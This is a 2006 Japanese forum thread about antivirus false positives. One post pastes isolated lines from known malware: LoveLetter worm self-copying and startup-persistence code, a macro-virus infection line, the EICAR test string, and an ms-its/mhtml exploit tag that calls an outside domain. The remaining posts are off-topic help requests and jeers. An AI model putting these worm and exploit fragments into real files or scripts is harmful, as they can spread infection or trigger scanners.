外部リンク[html]:www.geocities.co.jp
セキュリティ板
2ch板:sec
629: 2006/07/23(日) 19:35:23 ID:XNQAeCHC(1)調 AAS
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!外部リンク:www.loadcash.biz type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))
630: 2006/07/24(月) 00:49:37 ID:??? AAS
できれば既出のものじゃなくて
新しいの一行づつ張ってほしいなぁ。
631(2): 2006/07/29(土) 23:32:33 ID:??? AAS
2CH自体、5月からはじめました。
ノートンがなんだかよくわかりませんが、ある掲示板で症状を書き込んだところ
ノートン先生かといわれました。
症状としては、かんじなどを変換すると候補がでますが、するとその時点でIEが
強制終了してしまいます。
2CHはIEでみています。最初から。
これ、直るのでしょうか?
パソコン使えないとネットで就職活動もできず困っています。
どうかよろしくお願いします。
632(1): 2006/07/29(土) 23:59:23 ID:??? AAS
このスレとは関係ないような・・・
633(2): 2006/07/30(日) 00:06:37 ID:??? AAS
>>631
ですけど、感染したときにLOVE-LETTERなんとかというものが画面に表示されました。
そのときなんだかわからなかったので、続行のボタンを押しました。
漢字を変換するとIEが落ちてしまうので、最初に出てきた感じで該当するものが泣ければ
そのままにしています。
なんとかならないでしょうか。
634: 2006/07/30(日) 00:40:34 ID:??? AAS
ここはウイルス対策ソフトの「誤反応」のスレです。
ウイルスにほんとに感染してる件ならスレ違い
635: 2006/07/30(日) 03:56:39 ID:??? AAS
>>633
よく分からないならクリーンインストールしろ。
それも出来ないなら就職浪人決定。
636(1): 2006/07/30(日) 19:55:34 ID:??? AAS
クリーンインストールってなに?
637(1): 2006/07/30(日) 20:12:01 ID:??? AAS
おまえの頭を入れ替えること
638: 2006/07/31(月) 00:58:59 ID:??? AAS
つまらん。0点。>>637
639: 2006/07/31(月) 01:59:16 ID:??? AAS
女王様の椅子取りゲーム
上下前次1-新書関写板覧索設栞歴
あと 363 レスあります
スレ情報 赤レス抽出 画像レス抽出 歴の未読スレ
ぬこの手 ぬこTOP 0.389s*